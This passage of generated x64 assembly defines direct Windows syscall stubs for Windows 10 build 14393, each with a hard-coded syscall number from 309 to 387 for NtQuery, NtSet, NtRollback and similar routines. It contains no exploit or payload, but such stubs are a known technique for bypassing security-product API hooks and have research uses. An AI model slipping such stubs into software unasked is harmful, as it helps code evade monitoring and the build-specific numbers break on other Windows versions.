;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryFullAttributesFile ENDP
; ULONG64 __stdcall NtQueryInformationAtom( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationAtom PROC STDCALL
mov r10 , rcx
mov eax , 309
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationAtom ENDP
; ULONG64 __stdcall NtQueryInformationEnlistment( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 310
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationEnlistment ENDP
; ULONG64 __stdcall NtQueryInformationJobObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationJobObject PROC STDCALL
mov r10 , rcx
mov eax , 311
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationJobObject ENDP
; ULONG64 __stdcall NtQueryInformationPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationPort PROC STDCALL
mov r10 , rcx
mov eax , 312
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationPort ENDP
; ULONG64 __stdcall NtQueryInformationResourceManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 313
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationResourceManager ENDP
; ULONG64 __stdcall NtQueryInformationTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationTransaction PROC STDCALL
mov r10 , rcx
mov eax , 314
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationTransaction ENDP
; ULONG64 __stdcall NtQueryInformationTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 315
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationTransactionManager ENDP
; ULONG64 __stdcall NtQueryInformationWorkerFactory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationWorkerFactory PROC STDCALL
mov r10 , rcx
mov eax , 316
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationWorkerFactory ENDP
; ULONG64 __stdcall NtQueryInstallUILanguage( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInstallUILanguage PROC STDCALL
mov r10 , rcx
mov eax , 317
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInstallUILanguage ENDP
; ULONG64 __stdcall NtQueryIntervalProfile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryIntervalProfile PROC STDCALL
mov r10 , rcx
mov eax , 318
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryIntervalProfile ENDP
; ULONG64 __stdcall NtQueryIoCompletion( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryIoCompletion PROC STDCALL
mov r10 , rcx
mov eax , 319
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryIoCompletion ENDP
; ULONG64 __stdcall NtQueryLicenseValue( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryLicenseValue PROC STDCALL
mov r10 , rcx
mov eax , 320
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryLicenseValue ENDP
; ULONG64 __stdcall NtQueryMultipleValueKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryMultipleValueKey PROC STDCALL
mov r10 , rcx
mov eax , 321
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryMultipleValueKey ENDP
; ULONG64 __stdcall NtQueryMutant( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryMutant PROC STDCALL
mov r10 , rcx
mov eax , 322
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryMutant ENDP
; ULONG64 __stdcall NtQueryOpenSubKeys( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryOpenSubKeys PROC STDCALL
mov r10 , rcx
mov eax , 323
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryOpenSubKeys ENDP
; ULONG64 __stdcall NtQueryOpenSubKeysEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryOpenSubKeysEx PROC STDCALL
mov r10 , rcx
mov eax , 324
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryOpenSubKeysEx ENDP
; ULONG64 __stdcall NtQueryPortInformationProcess( );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryPortInformationProcess PROC STDCALL
mov r10 , rcx
mov eax , 325
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryPortInformationProcess ENDP
; ULONG64 __stdcall NtQueryQuotaInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryQuotaInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 326
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryQuotaInformationFile ENDP
; ULONG64 __stdcall NtQuerySecurityAttributesToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityAttributesToken PROC STDCALL
mov r10 , rcx
mov eax , 327
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityAttributesToken ENDP
; ULONG64 __stdcall NtQuerySecurityObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityObject PROC STDCALL
mov r10 , rcx
mov eax , 328
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityObject ENDP
; ULONG64 __stdcall NtQuerySecurityPolicy( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityPolicy PROC STDCALL
mov r10 , rcx
mov eax , 329
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySecurityPolicy ENDP
; ULONG64 __stdcall NtQuerySemaphore( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySemaphore PROC STDCALL
mov r10 , rcx
mov eax , 330
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySemaphore ENDP
; ULONG64 __stdcall NtQuerySymbolicLinkObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySymbolicLinkObject PROC STDCALL
mov r10 , rcx
mov eax , 331
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySymbolicLinkObject ENDP
; ULONG64 __stdcall NtQuerySystemEnvironmentValue( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemEnvironmentValue PROC STDCALL
mov r10 , rcx
mov eax , 332
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemEnvironmentValue ENDP
; ULONG64 __stdcall NtQuerySystemEnvironmentValueEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemEnvironmentValueEx PROC STDCALL
mov r10 , rcx
mov eax , 333
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemEnvironmentValueEx ENDP
; ULONG64 __stdcall NtQuerySystemInformationEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemInformationEx PROC STDCALL
mov r10 , rcx
mov eax , 334
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemInformationEx ENDP
; ULONG64 __stdcall NtQueryTimerResolution( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryTimerResolution PROC STDCALL
mov r10 , rcx
mov eax , 335
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryTimerResolution ENDP
; ULONG64 __stdcall NtQueryWnfStateData( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryWnfStateData PROC STDCALL
mov r10 , rcx
mov eax , 336
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryWnfStateData ENDP
; ULONG64 __stdcall NtQueryWnfStateNameInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryWnfStateNameInformation PROC STDCALL
mov r10 , rcx
mov eax , 337
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryWnfStateNameInformation ENDP
; ULONG64 __stdcall NtQueueApcThreadEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueueApcThreadEx PROC STDCALL
mov r10 , rcx
mov eax , 338
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueueApcThreadEx ENDP
; ULONG64 __stdcall NtRaiseException( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRaiseException PROC STDCALL
mov r10 , rcx
mov eax , 339
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRaiseException ENDP
; ULONG64 __stdcall NtRaiseHardError( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRaiseHardError PROC STDCALL
mov r10 , rcx
mov eax , 340
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRaiseHardError ENDP
; ULONG64 __stdcall NtReadOnlyEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReadOnlyEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 341
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReadOnlyEnlistment ENDP
; ULONG64 __stdcall NtRecoverEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 342
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverEnlistment ENDP
; ULONG64 __stdcall NtRecoverResourceManager( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 343
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverResourceManager ENDP
; ULONG64 __stdcall NtRecoverTransactionManager( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 344
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRecoverTransactionManager ENDP
; ULONG64 __stdcall NtRegisterProtocolAddressInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRegisterProtocolAddressInformation PROC STDCALL
mov r10 , rcx
mov eax , 345
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRegisterProtocolAddressInformation ENDP
; ULONG64 __stdcall NtRegisterThreadTerminatePort( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRegisterThreadTerminatePort PROC STDCALL
mov r10 , rcx
mov eax , 346
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRegisterThreadTerminatePort ENDP
; ULONG64 __stdcall NtReleaseKeyedEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseKeyedEvent PROC STDCALL
mov r10 , rcx
mov eax , 347
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseKeyedEvent ENDP
; ULONG64 __stdcall NtReleaseWorkerFactoryWorker( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseWorkerFactoryWorker PROC STDCALL
mov r10 , rcx
mov eax , 348
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseWorkerFactoryWorker ENDP
; ULONG64 __stdcall NtRemoveIoCompletionEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveIoCompletionEx PROC STDCALL
mov r10 , rcx
mov eax , 349
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveIoCompletionEx ENDP
; ULONG64 __stdcall NtRemoveProcessDebug( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveProcessDebug PROC STDCALL
mov r10 , rcx
mov eax , 350
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveProcessDebug ENDP
; ULONG64 __stdcall NtRenameKey( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRenameKey PROC STDCALL
mov r10 , rcx
mov eax , 351
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRenameKey ENDP
; ULONG64 __stdcall NtRenameTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRenameTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 352
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRenameTransactionManager ENDP
; ULONG64 __stdcall NtReplaceKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplaceKey PROC STDCALL
mov r10 , rcx
mov eax , 353
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplaceKey ENDP
; ULONG64 __stdcall NtReplacePartitionUnit( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplacePartitionUnit PROC STDCALL
mov r10 , rcx
mov eax , 354
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplacePartitionUnit ENDP
; ULONG64 __stdcall NtReplyWaitReplyPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReplyPort PROC STDCALL
mov r10 , rcx
mov eax , 355
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReplyPort ENDP
; ULONG64 __stdcall NtRequestPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRequestPort PROC STDCALL
mov r10 , rcx
mov eax , 356
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRequestPort ENDP
; ULONG64 __stdcall NtResetEvent( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtResetEvent PROC STDCALL
mov r10 , rcx
mov eax , 357
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtResetEvent ENDP
; ULONG64 __stdcall NtResetWriteWatch( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtResetWriteWatch PROC STDCALL
mov r10 , rcx
mov eax , 358
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtResetWriteWatch ENDP
; ULONG64 __stdcall NtRestoreKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRestoreKey PROC STDCALL
mov r10 , rcx
mov eax , 359
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRestoreKey ENDP
; ULONG64 __stdcall NtResumeProcess( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtResumeProcess PROC STDCALL
mov r10 , rcx
mov eax , 360
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtResumeProcess ENDP
; ULONG64 __stdcall NtRevertContainerImpersonation( );
_10_0_14393_sp0_windows_10_rs1_1607_NtRevertContainerImpersonation PROC STDCALL
mov r10 , rcx
mov eax , 361
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRevertContainerImpersonation ENDP
; ULONG64 __stdcall NtRollbackComplete( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackComplete PROC STDCALL
mov r10 , rcx
mov eax , 362
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackComplete ENDP
; ULONG64 __stdcall NtRollbackEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 363
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackEnlistment ENDP
; ULONG64 __stdcall NtRollbackRegistryTransaction( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackRegistryTransaction PROC STDCALL
mov r10 , rcx
mov eax , 364
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackRegistryTransaction ENDP
; ULONG64 __stdcall NtRollbackTransaction( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackTransaction PROC STDCALL
mov r10 , rcx
mov eax , 365
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRollbackTransaction ENDP
; ULONG64 __stdcall NtRollforwardTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRollforwardTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 366
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRollforwardTransactionManager ENDP
; ULONG64 __stdcall NtSaveKey( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveKey PROC STDCALL
mov r10 , rcx
mov eax , 367
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveKey ENDP
; ULONG64 __stdcall NtSaveKeyEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveKeyEx PROC STDCALL
mov r10 , rcx
mov eax , 368
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveKeyEx ENDP
; ULONG64 __stdcall NtSaveMergedKeys( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveMergedKeys PROC STDCALL
mov r10 , rcx
mov eax , 369
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSaveMergedKeys ENDP
; ULONG64 __stdcall NtSecureConnectPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSecureConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 370
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSecureConnectPort ENDP
; ULONG64 __stdcall NtSerializeBoot( );
_10_0_14393_sp0_windows_10_rs1_1607_NtSerializeBoot PROC STDCALL
mov r10 , rcx
mov eax , 371
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSerializeBoot ENDP
; ULONG64 __stdcall NtSetBootEntryOrder( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetBootEntryOrder PROC STDCALL
mov r10 , rcx
mov eax , 372
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetBootEntryOrder ENDP
; ULONG64 __stdcall NtSetBootOptions( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetBootOptions PROC STDCALL
mov r10 , rcx
mov eax , 373
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetBootOptions ENDP
; ULONG64 __stdcall NtSetCachedSigningLevel( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetCachedSigningLevel PROC STDCALL
mov r10 , rcx
mov eax , 374
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetCachedSigningLevel ENDP
; ULONG64 __stdcall NtSetCachedSigningLevel2( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetCachedSigningLevel2 PROC STDCALL
mov r10 , rcx
mov eax , 375
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetCachedSigningLevel2 ENDP
; ULONG64 __stdcall NtSetContextThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetContextThread PROC STDCALL
mov r10 , rcx
mov eax , 376
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetContextThread ENDP
; ULONG64 __stdcall NtSetDebugFilterState( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDebugFilterState PROC STDCALL
mov r10 , rcx
mov eax , 377
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDebugFilterState ENDP
; ULONG64 __stdcall NtSetDefaultHardErrorPort( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultHardErrorPort PROC STDCALL
mov r10 , rcx
mov eax , 378
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultHardErrorPort ENDP
; ULONG64 __stdcall NtSetDefaultLocale( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultLocale PROC STDCALL
mov r10 , rcx
mov eax , 379
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultLocale ENDP
; ULONG64 __stdcall NtSetDefaultUILanguage( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultUILanguage PROC STDCALL
mov r10 , rcx
mov eax , 380
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDefaultUILanguage ENDP
; ULONG64 __stdcall NtSetDriverEntryOrder( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDriverEntryOrder PROC STDCALL
mov r10 , rcx
mov eax , 381
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetDriverEntryOrder ENDP
; ULONG64 __stdcall NtSetEaFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEaFile PROC STDCALL
mov r10 , rcx
mov eax , 382
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEaFile ENDP
; ULONG64 __stdcall NtSetHighEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetHighEventPair PROC STDCALL
mov r10 , rcx
mov eax , 383
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetHighEventPair ENDP
; ULONG64 __stdcall NtSetHighWaitLowEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetHighWaitLowEventPair PROC STDCALL
mov r10 , rcx
mov eax , 384
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetHighWaitLowEventPair ENDP
; ULONG64 __stdcall NtSetIRTimer( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIRTimer PROC STDCALL
mov r10 , rcx
mov eax , 385
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIRTimer ENDP
; ULONG64 __stdcall NtSetInformationDebugObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationDebugObject PROC STDCALL
mov r10 , rcx
mov eax , 386
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationDebugObject ENDP
; ULONG64 __stdcall NtSetInformationEnlistment( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 387
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationEnlistment ENDP
